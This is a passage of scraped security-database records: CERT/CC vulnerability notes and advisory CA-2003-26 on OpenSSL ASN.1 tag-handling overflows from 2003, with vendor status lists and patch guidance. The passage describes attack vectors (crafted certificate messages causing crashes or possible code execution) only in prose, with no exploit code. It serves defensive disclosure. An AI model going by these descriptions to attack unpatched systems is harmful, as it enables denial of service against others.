vulnerability in the way OpenSSL handles ASN.1 tags could allow a remote attacker to cause a denial of service.\n\n### Description \n\n[OpenSSL](<http://www.openssl.org/>) implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols and includes a general purpose cryptographic library. SSL and TLS are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network applications such as HTTP, IMAP, POP3, LDAP, and others. Clients and servers exchange authentication information in X.509 certificates. While the SSL and TLS protocols are not directly based on ASN.1, they do rely on ASN.1 objects used in X.509 certificates and other cryptographic elements (e.g. PKCS#1 encoded RSA values).\n\nOpenSSL contains an integer overflow vulnerability in the way ASN.1 tags are handled. A specially crafted ASN.1 tag could cause the OpenSSL library to perform an out-of-bounds memory read operation. This could result in a denial of service, crashing the process using the OpenSSL library. \n \nFrom the OpenSSL [advisory](<http://www.openssl.org/news/secadv_20030930.txt>):\n\n> \n> 2. Unusual ASN.1 tag values can cause an out of bounds read undercertain circumstances, resulting in a denial of service vulnerability.\n\nAll versions of SSLeay and versions of OpenSSL prior to 0.9.7c or 0.9.6k are vulnerable, as are operating systems and applications that use vulnerable SSLeay or OpenSSL libraries. The OpenSSL[ advisory](<http://www.openssl.org/news/secadv_20030930.txt>) describes as vulnerable \"Any application that makes use of OpenSSL's ASN1 library to parse untrusted data. This includes all SSL or TLS applications, those using S/MIME (PKCS#7) or certificate generation routines.\" \n \nThe U.K. National Infrastructure Security Co-ordination Centre ([NISCC](<http://www.niscc.gov.uk/>)) is tracking this vulnerability (VU#380864) and VU#255484 as [NISCC/006489/openssl/1](<http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm>). \n \n--- \n \n### Impact \n\nBy providing specially crafted ASN.1 encoded data to a vulnerable system, a remote attacker could cause a denial of service. One potential attack vector is a client certificate message containing specially crafted X.509 certificates. \n \n--- \n \n### Solution \n\n**Upgrade or Patch** \nUpgrade to OpenSSL 0.9.7c or 0.9.6k. Alternatively, upgrade or apply a patch as specified by your vendor. Further information is available in an [advisory](<http://www.openssl.org/news/secadv_20030930.txt>) from OpenSSL. Note that it is necessary to recompile any applications that are statically linked to OpenSSL libraries. \n \n--- \n \n### Vendor Information\n\n380864\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### OpenSSL __ Affected\n\nUpdated: September 30, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see &lt;<http://www.openssl.org/news/secadv_20030930.txt>&gt;.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23380864 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm>\n * <http://www.openssl.org/news/secadv_20030930.txt>\n * <http://wp.netscape.com/eng/ssl3/>\n * <http://www.ietf.org/rfc/rfc2246.txt>\n * <http://www.ietf.org/html.charters/pkix-charter.html>\n * <http://www.itu.int/ITU-T/studygroups/com10/languages/>\n\n### Acknowledgements\n\nThis vulnerability was discovered and researched by NISCC.\n\nThis document was written by Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2003-0544](<http://web.nvd.nist.gov/vuln/detail/CVE-2003-0544>) \n---|--- \n**CERT Advisory:** | [CA-2003-26 ](<http://www.cert.org/advisories/CA-2003-26.html>) \n**Severity Metric:** | 11.25 \n**Date Public:** | 2003-09-30 \n**Date First Published:** | 2003-09-30 \n**Date Last Updated: ** | 2003-10-01 22:26 UTC \n**Document Revision: ** | 38 \n", "modified": "2003-10-01T22:26:00", "published": "2003-09-30T00:00:00", "id": "VU:380864", "href": "https://www.kb.cert.org/vuls/id/380864", "type": "cert", "title": "OpenSSL contains integer overflow handling ASN.1 tags (2)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-18T20:44:10", "bulletinFamily": "info", "cvelist": ["CVE-2003-0543"], "description": "### Overview \n\nA vulnerability in the way OpenSSL handles ASN.1 tags could allow a remote attacker to cause a denial of service.\n\n### Description \n\n[OpenSSL](<http://www.openssl.org/>) implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols and includes a general purpose cryptographic library. SSL and TLS are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network applications such as HTTP, IMAP, POP3, LDAP, and others. Clients and servers exchange authentication information in X.509 certificates. While the SSL and TLS protocols are not directly based on ASN.1, they do rely on ASN.1 objects used in X.509 certificates and other cryptographic elements (e.g. PKCS#1 encoded RSA values).\n\nOpenSSL contains an integer overflow vulnerability in the way ASN.1 tags are handled. A specially crafted ASN.1 tag could cause the OpenSSL library to perform an out-of-bounds memory read operation. This could result in a denial of service, crashing the process using the OpenSSL library. \n \nFrom the OpenSSL [advisory](<http://www.openssl.org/news/secadv_20030930.txt>):\n\n> \n> 2. Unusual ASN.1 tag values can cause an out of bounds read undercertain circumstances, resulting in a denial of service vulnerability.\n\nAll versions of SSLeay and versions of OpenSSL prior to 0.9.7c or 0.9.6k are vulnerable, as are operating systems and applications that use vulnerable SSLeay or OpenSSL libraries. The OpenSSL[ advisory](<http://www.openssl.org/news/secadv_20030930.txt>) describes as vulnerable \"Any application that makes use of OpenSSL's ASN1 library to parse untrusted data. This includes all SSL or TLS applications, those using S/MIME (PKCS#7) or certificate generation routines.\" \n \nThe U.K. National Infrastructure Security Co-ordination Centre ([NISCC](<http://www.niscc.gov.uk/>)) is tracking this vulnerability (VU#255484) and VU#380864 as [NISCC/006489/openssl/1](<http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm>). \n \n--- \n \n### Impact \n\nBy providing specially crafted ASN.1 encoded data to a vulnerable system, a remote attacker could cause a denial of service. One potential attack vector is a client certificate message containing specially crafted X.509 certificates. \n \n--- \n \n### Solution \n\n**Upgrade or Patch** \nUpgrade to OpenSSL 0.9.7c or 0.9.6k. Alternatively, upgrade or apply a patch as specified by your vendor. Further information is available in an [advisory](<http://www.openssl.org/news/secadv_20030930.txt>) from OpenSSL. Note that it is necessary to recompile any applications that are statically linked to OpenSSL libraries. \n \n--- \n \n### Vendor Information\n\n255484\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### MandrakeSoft Affected\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### OpenSSL __ Affected\n\nUpdated: September 30, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see &lt;<http://www.openssl.org/news/secadv_20030930.txt>&gt;.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### Red Hat Inc. Affected\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### Apache Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### Apache-SSL Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### Apple Computer Inc. Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### FreeBSD Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### Guardian Digital Inc. Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### OpenBSD Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### Stunnel Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### SuSE Inc. Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### TurboLinux Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\n### mod_ssl Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23255484 Feedback>).\n\nView all 14 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm>\n * <http://www.openssl.org/news/secadv_20030930.txt>\n * <http://wp.netscape.com/eng/ssl3/>\n * <http://www.ietf.org/rfc/rfc2246.txt>\n * <http://www.ietf.org/html.charters/pkix-charter.html>\n * <http://www.itu.int/ITU-T/studygroups/com10/languages/>\n\n### Acknowledgements\n\nThis vulnerability was discovered and researched by NISCC.\n\nThis document was written by Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2003-0543](<http://web.nvd.nist.gov/vuln/detail/CVE-2003-0543>) \n---|--- \n**CERT Advisory:** | [CA-2003-26 ](<http://www.cert.org/advisories/CA-2003-26.html>) \n**Severity Metric:** | 11.25 \n**Date Public:** | 2003-09-30 \n**Date First Published:** | 2003-09-30 \n**Date Last Updated: ** | 2003-10-01 22:26 UTC \n**Document Revision: ** | 43 \n", "modified": "2003-10-01T22:26:00", "published": "2003-09-30T00:00:00", "id": "VU:255484", "href": "https://www.kb.cert.org/vuls/id/255484", "type": "cert", "title": "OpenSSL contains integer overflow handling ASN.1 tags (1)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:08", "bulletinFamily": "software", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\nCERT Advisory CA-2003-26 Multiple Vulnerabilities in SSL/TLS\r\nImplementations\r\n\r\n Original issue date: October 1, 2003\r\n Last revised: --\r\n Source: CERT/CC\r\n\r\n A complete revision history is at the end of this file.\r\n\r\n\r\nSystems Affected\r\n\r\n * OpenSSL versions prior to 0.9.7c and 0.9.6k\r\n * Multiple SSL/TLS implementations\r\n * SSLeay library\r\n\r\n\r\nOverview\r\n\r\n There are multiple vulnerabilities in different implementations of the\r\n Secure Sockets Layer &#40;SSL&#41; and Transport Layer Security &#40;TLS&#41;\r\n protocols. These vulnerabilities occur primarily in Abstract Syntax\r\n Notation One &#40;ASN.1&#41; parsing code. The most serious vulnerabilities\r\n may allow a remote attacker to execute arbitrary code. The common\r\n impact is denial of service.\r\n\r\n\r\nI. Description\r\n\r\n SSL and TLS are used to provide authentication, encryption, and\r\n integrity services to higher-level network applications such as HTTP.\r\n Cryptographic elements used by the protocols, such as X.509\r\n certificates, are represented as ASN.1 objects. In order to encode and\r\n decode these objects, many SSL and TLS implementations &#40;and\r\n cryptographic libraries&#41; include ASN.1 parsers.\r\n\r\n OpenSSL is a widely-deployed open source implementation of the SSL and\r\n TLS protocols. OpenSSL also provides a general-purpose cryptographic\r\n library that includes an ASN.1 parser.\r\n\r\n The U.K. National Infrastructure Security Co-ordination Centre &#40;NISCC&#41;\r\n has developed a test suite to analyze the way SSL and TLS\r\n implementations handle exceptional ASN.1 objects contained in client\r\n and server certificate messages. Although the test suite focuses on\r\n certificate messages, any untrusted ASN.1 element may be used as an\r\n attack vector. An advisory from OpenSSL describes as vulnerable &quot;Any\r\n application that makes use of OpenSSL&#39;s ASN1 library to parse\r\n untrusted data. This includes all SSL or TLS applications, those using\r\n S/MIME &#40;PKCS#7&#41; or certificate generation routines.&quot;\r\n\r\n There are two certificate message attack vectors. An attacker can send\r\n crafted client certificate messages to a server, or attempt to cause a\r\n client to connect to a server under the attacker&#39;s control. When the\r\n client connects, the attacker can deliver a crafted server certificate\r\n message. Note that the standards for TLS &#40;RFC 2246&#41; and SSL 3.0 state\r\n that a client certificate message &quot;...is only sent if the server\r\n requests a certificate.&quot; To reduce exposure to these types of attacks,\r\n an SSL/TLS server should ignore unsolicited client certificate\r\n messages &#40;VU#732952&#41;.\r\n\r\n NISCC has published two advisories describing vulnerabilities in\r\n OpenSSL &#40;006489/OpenSSL&#41; and other SSL/TLS implementations\r\n &#40;006489/TLS&#41;. The second advisory covers multiple vulnerabilities in\r\n many vendors&#39; products. Further details, including vendor status\r\n information, are available in the following vulnerability notes.\r\n\r\n VU#935264 - OpenSSL ASN.1 parser insecure memory deallocation\r\n A vulnerability in the way OpenSSL deallocates memory used to store\r\n ASN.1 structures could allow a remote attacker to execute arbitrary\r\n code with the privileges of the process using the OpenSSL library.\r\n &#40;Other resources: NISCC/006490/OpenSSL/3, OpenSSL #1, CAN-2003-0545&#41;\r\n\r\n VU#255484 - OpenSSL contains integer overflow handling ASN.1 tags &#40;1&#41;\r\n An integer overflow vulnerability in the way OpenSSL handles ASN.1\r\n tags could allow a remote attacker to cause a denial of service.\r\n &#40;Other resources: NISCC/006490/OpenSSL/1, OpenSSL #2, CAN-2003-0543&#41;\r\n\r\n VU#380864 - OpenSSL contains integer overflow handling ASN.1 tags &#40;2&#41;\r\n A second integer overflow vulnerability in the way OpenSSL handles\r\n ASN.1 tags could allow a remote attacker to cause a denial of service.\r\n &#40;Other resources: NISCC/006490/OpenSSL/1, OpenSSL #2, CAN-2003-0544&#41;\r\n\r\n VU#686224 - OpenSSL does not securely handle invalid public key when\r\n configured to ignore errors\r\n A vulnerability in the way OpenSSL handles invalid public keys in\r\n client certificate messages could allow a remote attacker to cause a\r\n denial of service. This vulnerability requires as a precondition that\r\n an application is configured to ignore public key decoding errors,\r\n which is not typically the case on production systems.\r\n &#40;Other resources: NISCC/006490/OpenSSL/2, OpenSSL #3&#41;\r\n\r\n VU#732952 - OpenSSL accepts unsolicited client certificate messages\r\n OpenSSL accepts unsolicited client certificate messages. This could\r\n allow an attacker to exploit underlying flaws in client certificate\r\n handling, such as the vulnerabilities listed above.\r\n &#40;Other resources: OpenSSL #4&#41;\r\n\r\n VU#104280 - Multiple vulnerabilities in SSL/TLS implementations\r\n Multiple vulnerabilities exist in different vendors&#39; SSL/TLS\r\n implementations. The impacts of these vulnerabilities include remote\r\n execution of arbitrary code, denial of service, and disclosure of\r\n sensitive information. VU#104280 covers an undefined set of\r\n vulnerabilities that affect SSL/TLS implementations from many\r\n different vendors.\r\n &#40;Other resources: NISCC/006490/TLS&#41;\r\n\r\n\r\nII. Impact\r\n\r\n The impacts of these vulnerabilities vary. In almost all, a remote\r\n attacker could cause a denial of service. For at least one\r\n vulnerability in OpenSSL &#40;VU#935264&#41;, a remote attacker may be able to\r\n execute arbitrary code. Please see Appendix A, the Systems Affected\r\n section of VU#104280, and the OpenSSL vulnerability notes for details.\r\n\r\n\r\nIII. Solution\r\n\r\nUpgrade or apply a patch\r\n\r\n To resolve the OpenSSL vulnerabilities, upgrade to OpenSSL 0.9.7c or\r\n OpenSSL 0.9.6k. Alternatively, upgrade or apply a patch as directed by\r\n your vendor. Recompile any applications that are statically linked to\r\n OpenSSL libraries.\r\n\r\n For solutions for the other SSL/TLS vulnerabilities covered by\r\n VU#104280, please see Appendix A and the Systems Affected section of\r\n VU#104280.\r\n\r\n\r\nAppendix A. Vendor Information\r\n\r\n This appendix contains information provided by vendors. When vendors\r\n report new information, this section is updated, and the changes are\r\n noted in the revision history. If a vendor is not listed below, we\r\n have not received their authenticated, direct statement. Further\r\n vendor information is available in the Systems Affected sections of\r\n the vulnerability notes listed above.\r\n\r\nAppGate Network Security AB\r\n\r\n The default configuration of AppGate is not vulnerable. However\r\n some extra functionality which administrators can enable manually\r\n may cause the system to become vulnerable. For more details check\r\n the AppGate support pages at http://www.appgate.com/support.\r\n\r\nApple Computer Inc.\r\n\r\n Apple: Vulnerable. This is fixed in Mac OS X 10.2.8 which is\r\n available from http://www.apple.com/support/\r\n\r\nClavister\r\n\r\n Clavister Firewall: Not vulnerable\r\n As of version 8.3, Clavister Firewall implements an optional HTTP/S\r\n server for purposes of user authentication. However, since this\r\n implementation does not support client certificates and has no\r\n ASN.1 parser code, there can be no ASN.1-related vulnerabilities as\r\n far as SSL is concerned.\r\n\r\n Earlier versions of Clavister Firewall do not implement any SSL\r\n services.\r\n\r\nCray Inc.\r\n\r\n Cray Inc. supports OpenSSL through its Cray Open Software &#40;COS&#41;\r\n package. The OpenSSL version in COS 3.4 and earlier is vulnerable.\r\n Spr 726919 has been opened to address this.\r\n\r\nF5 Networks\r\n\r\n F5 products BIG-IP, 3-DNS, ISMan and Firepass are vulnerable. F5\r\n will have ready security patches for each of these products. Go to\r\n ask.f5.com for the appropriate security response instructions for\r\n your product.\r\n\r\nHitachi\r\n\r\n Hitachi Web Server is NOT Vulnerable to this issue.\r\n\r\nIBM\r\n\r\n [AIX]\r\n The AIX Security Team is aware of the issues discussed in CERT\r\n Vulnerability Notes VU#255484, VU#380864, VU#686224, VU#935264 and\r\n VU#732952.\r\n\r\n OpenSSL is available for AIX via the AIX Toolbox for Linux. Please\r\n note that the Toolbox is made available &quot;as-is&quot; and is unwarranted.\r\n The Toolbox ships with OpenSSL 0.9.6g which is vulnerable to the\r\n issues referenced above. A patched version of OpenSSL will be\r\n provided shortly and this vendor statement will be updated at that\r\n time.\r\n\r\n Please note that OpenSSH, which is made available through the\r\n Expansion Pack is not vulnerable to these issues.\r\n\r\n [eServer]\r\n IBM eServer Platform Response\r\n For information related to this and other published CERT Advisories\r\n that may relate to the IBM eServer Platforms &#40;xSeries, iSeries,\r\n pSeries, and zSeries&#41; please go to\r\n https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/\r\n securityalerts?OpenDocument&pathID=\r\n\r\n In order to access this information you will require a Resource\r\n Link ID. To subscribe to Resource Link go to\r\n http://app-06.www.ibm.com/servers/resourcelink and follow the steps\r\n for registration.\r\n\r\n All questions should be refered to servsec@us.ibm.com.\r\n\r\nIngrian Networks\r\n\r\n Ingrian Networks is aware of this vulnerablity and will issue a\r\n security advisory when our investigation is complete.\r\n\r\nJuniper Networks\r\n\r\n The OpenSSL code included in domestic versions of JUNOS Internet\r\n Software that runs on all M-series and T-series routers is\r\n susceptible to these vulnerabilities. The SSL library included in\r\n Releases 2.x and 3.x of SDX provisioning software for E-series\r\n routers is susceptible to these vulnerabilities.\r\n\r\n Solution Implementation\r\n Corrections for all the above vulnerabilities are included in all\r\n versions of JUNOS built on or after October 2, 2003. Customers\r\n should contact Juniper Networks Technical Assistance Center &#40;JTAC&#41;\r\n for instructions on obtaining and installing the corrected code.\r\n SDX software built on or after October 2, 2003, contain SSL\r\n libraries with corrected code. Contact JTAC for instructions on\r\n obtaining and installing the corrected code.\r\n\r\nMandrakeSoft\r\n\r\n The vulnerabilities referenced by VU#255484, VU#380864, and\r\n VU#935264 have been corrected by packages released in our\r\n MDKSA-2003:098 advisory.\r\n\r\nNEC Corporation\r\n\r\n Subject: VU#104280\r\n sent on October 1, 2003\r\n\r\n [Server Products]\r\n * EWS/UP 48 Series operating system\r\n - is NOT vulnerable.\r\n It doesn&#39;t include SSL/TLS implementation.\r\n\r\nNovell\r\n\r\n Novell is reviewing our application portfolio to identify products\r\n affected by the vulnerabilities reported by the NISCC. We have the\r\n patched OpenSSL code and are reviewing and testing it internally,\r\n and preparing patches for our products that are affected. We expect\r\n the first patches to become available via our Security Alerts web\r\n site &#40;http://support.novell.com/security-alerts&#41; during the week of\r\n 6 Oct 2003. Customers are urged to monitor our web site for patches\r\n to versions of our products that they use and apply them\r\n expeditiously.\r\n\r\nOpenSSL\r\n\r\n Please see OpenSSL Security Advisory [30 September 2003].\r\n\r\nOpenwall GNU/*/Linux\r\n\r\n Openwall GNU/*/Linux currently uses OpenSSL 0.9.6 branch and thus\r\n was affected by the ASN.1 parsing and client certificate handling\r\n vulnerabilities pertaining to those versions of OpenSSL. It was not\r\n affected by the potentially more serious incorrect memory\r\n deallocation vulnerability &#40;VU#935264, CVE CAN-2003-0545&#41; that is\r\n specific to OpenSSL 0.9.7.\r\n\r\n Owl-current as of 2003/10/01 has been updated to OpenSSL 0.9.6k,\r\n thus correcting the vulnerabilities.\r\n\r\nRed Hat\r\n\r\n Red Hat distributes OpenSSL 0.9.6 in various Red Hat Linux\r\n distributions and with the Stronghold secure web server. Updated\r\n packages which contain backported patches for these issues are\r\n available along with our advisories at the URL below. Users of the\r\n Red Hat Network can update their systems using the &#39;up2date&#39; tool.\r\n\r\n Red Hat Enterprise Linux:\r\n http://rhn.redhat.com/errata/RHSA-2003-293.html\r\n\r\n Red Hat Linux 7.1, 7.2, 7.3, 8.0:\r\n http://rhn.redhat.com/errata/RHSA-2003-291.html\r\n\r\n Stronghold 4 cross-platform:\r\n http://rhn.redhat.com/errata/RHSA-2003-290.html\r\n\r\n Red Hat distributes OpenSSL 0.9.7 in Red Hat Linux 9. Updated\r\n packages which contain backported patches for these issues are\r\n available along with our advisory at the URL below. Users of the\r\n Red Hat Network can update their systems using the &#39;up2date&#39; tool.\r\n\r\n Red Hat Linux 9:\r\n http://rhn.redhat.com/errata/RHSA-2003-292.html\r\n\r\nRiverstone Networks\r\n\r\n Riverstone Networks routers are not vulnerable.\r\n\r\nSCO\r\n\r\n We are aware of the issue and are diligently working on a fix.\r\n\r\nSGI\r\n\r\n SGI acknowledges receiving the vulnerabilities reported by CERT and\r\n NISCC. CAN-2003-0543 [VU#255484], CAN-2003-0544 [VU#380864] and\r\n CAN-2003-0545 [VU#935264] have been addressed by SGI Security\r\n Advisory 20030904-01-P:\r\n\r\n ftp://patches.sgi.com/support/free/security/advisories/20030904-01-\r\n P.asc\r\n\r\n No further information is available at this time.\r\n\r\n For the protection of all our customers, SGI does not disclose,\r\n discuss or confirm vulnerabilities until a full investigation has\r\n occurred and any necessary patch&#40;es&#41; or release streams are\r\n available for all vulnerable and supported SGI operating systems.\r\n Until SGI has more definitive information to provide, customers are\r\n encouraged to assume all security vulnerabilities as exploitable\r\n and take appropriate steps according to local site security\r\n policies and requirements. As further information becomes\r\n available, additional advisories will be issued via the normal SGI\r\n security information distribution methods including the wiretap\r\n mailing list on http://www.sgi.com/support/security/\r\n\r\nStonesoft\r\n\r\n Stonesoft has published a security advisory that addresses the\r\n issues in vulnerability notes VU#255484 and VU#104280. The advisory\r\n is at http://www.stonesoft.com/document/art/3040.html\r\n\r\nStunnel\r\n\r\n Stunnel requires the OpenSSL libraries for compilation &#40;POSIX&#41; or\r\n OpenSSL DLLs for runtime operation &#40;Windows&#41;. While Stunnel itself\r\n is not vulnerable, it&#39;s dependence on OpenSSL means that your\r\n installation likely is vulnerable.\r\n\r\n If you compile from source, you need to install a non-vulnerable\r\n version of OpenSSL and recompile Stunnel.\r\n\r\n If you use the compiled Windows DLLs from stunnel.org, you should\r\n download new versions which are not vulnerable. OpenSSL 0.9.7c DLLs\r\n are available at\r\n http://www.stunnel.org/download/stunnel/win32/openssl-0.9.7c/\r\n\r\n No new version of Stunnel source or executable will be made\r\n available, because the problems are inside OpenSSL -- Stunnel\r\n itself does not have the vulnerability.\r\n\r\nSuSE\r\n\r\n All SuSE products are affected. Update packages are being tested\r\n and will be published on Wednesday, October 1st.\r\n\r\nVanDyke\r\n\r\n None the VanDyke Software products are subject to these\r\n vulnerabilities due to the fact that OpenSSL is not used in any\r\n VanDyke products.\r\n\r\n\r\nAppendix B. References\r\n\r\n * CERT/CC Vulnerability Note VU#935264 -\r\n &lt;http://www.kb.cert.org/vuls/id/935264&gt;\r\n * CERT/CC Vulnerability Note VU#255484 -\r\n &lt;http://www.kb.cert.org/vuls/id/255484&gt;\r\n * CERT/CC Vulnerability Note VU#380864 -\r\n &lt;http://www.kb.cert.org/vuls/id/380864&gt;\r\n * CERT/CC Vulnerability Note VU#686224 -\r\n &lt;http://www.kb.cert.org/vuls/id/686224&gt;\r\n * CERT/CC Vulnerability Note VU#732952 -\r\n &lt;http://www.kb.cert.org/vuls/id/732952&gt;\r\n * CERT/CC Vulnerability Note VU#104280 -\r\n &lt;http://www.kb.cert.org/vuls/id/104280&gt;\r\n * OpenSSL Security Advisory [30 September 2003] -\r\n &lt;http://www.openssl.org/news/secadv_20030930.txt&gt;\r\n * NISCC Vulnerability Advisory 006489/OpenSSL -\r\n &lt;http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm&gt;\r\n * NISCC Vulnerability Advisory 006489/TLS -\r\n &lt;http://www.uniras.gov.uk/vuls/2003/006489/tls.htm&gt;\r\n * ITU ASN.1 documentation -\r\n &lt;http://www.itu.int/ITU-T/studygroups/com10/languages/&gt;\r\n\r\n _________________________________________________________________\r\n\r\n NISCC discovered and researched these vulnerabilities; this document\r\n is based on their work. We would like to thank Stephen Henson of the\r\n OpenSSL project and the Oulu University Secure Programming Group\r\n &#40;OUSPG&#41; for their previous work in this area.\r\n _________________________________________________________________\r\n\r\n Feedback can be directed to the author, Art Manion.\r\n ______________________________________________________________________\r\n\r\n This document is available from:\r\n http://www.cert.org/advisories/CA-2003-26.html\r\n ______________________________________________________________________\r\n\r\n\r\nCERT/CC Contact Information\r\n\r\n Email: cert@cert.org\r\n Phone: +1 412-268-7090 &#40;24-hour 